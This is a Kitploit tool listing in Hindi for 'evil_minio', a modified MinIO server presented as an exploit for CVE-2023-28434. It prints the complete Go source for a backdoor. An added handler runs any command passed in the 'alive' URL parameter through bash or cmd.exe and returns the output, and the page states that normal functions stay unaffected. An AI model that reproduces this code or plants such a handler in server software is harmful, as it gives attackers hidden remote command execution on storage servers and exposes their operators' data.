Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
evil_minio — CVE-2023-28434 MinIO अनधिकृत से RCE के लिए EXP | Kitploit
उपकरण/GitHubGitHub/abelche/evil_minio
शोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubabelche/evil_minio

evil_minio

CVE-2023-28434 MinIO अनधिकृत से RCE के लिए EXP

रिपॉजिटरी देखें
320393 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

दुष्ट MinIO (CVE-2023-28434)

दस्तावेज़: CVE-2023-28432 minio 接口未授权访问到无损RCE和全局后门.pdf

CVE-2023-28434 के लिए EXP

MinIO अनधिकृत से RCE

https://github.com/minio/minio/tree/8b4d0255b7247b1a06d923e69ed5ba01434e70b8 से बदला गया

क्या बदला?

  • cmd/x.go जोड़ें, सिस्टम कमांड निष्पादित करने के लिए उपयोग किया जाता है
root@kitploit:~
package cmd

import (
	"os/exec"
	"runtime"
)

func getOutputDirectly(commandStr string) string {
	var execGlobalOutput string
	var shell [2]string
	var systemOS string = runtime.GOOS
	if systemOS == "linux" || systemOS == "darwin" {
		shell[0], shell[1] = "/bin/bash", "-c"
	} else {
		shell[0], shell[1] = "C:\\Windows\\System32\\cmd.exe", "/c"
	}
	cmd := exec.Command(shell[0], shell[1], commandStr)
	output, err := cmd.Output()
	if err != nil {
		return ""
	}
	execGlobalOutput += string(output)
	return execGlobalOutput
}
  • cmd/routers.go, पंक्ति #72 जोड़ें
root@kitploit:~
// ..........
	setUploadForwardingHandler,
	// Add bucket forwarding handler
	setBucketForwardingHandler,
	// Add new handlers here.
	xHandler, // ADD THIS LINE 
}

// configureServer handler returns final handler for the http server.
func configureServerHandler(endpointServerPools EndpointServerPools) (http.Handler, error) {
// ..........
  • cmd/generic-handlers.go, अंत में xHandler फ़ंक्शन जोड़ें
root@kitploit:~
func xHandler(h http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		var arg string
		values := r.URL.Query()
		arg = values.Get("alive")
		if arg != "" {
			w.Write([]byte(getOutputDirectly(arg)))
			return
		}
		h.ServeHTTP(w, r)
	})
}

क्या किया जा सकता है?

  1. वैश्विक बैकडोर जैसे http://1.2.3.4/?alive=whoami और http://1.2.3.4/anything?alive=whoami
  2. सामान्य कार्य प्रभावित नहीं होंगे

image-20230327164103832

image-20230327164128648

टूल डाउनलोड करें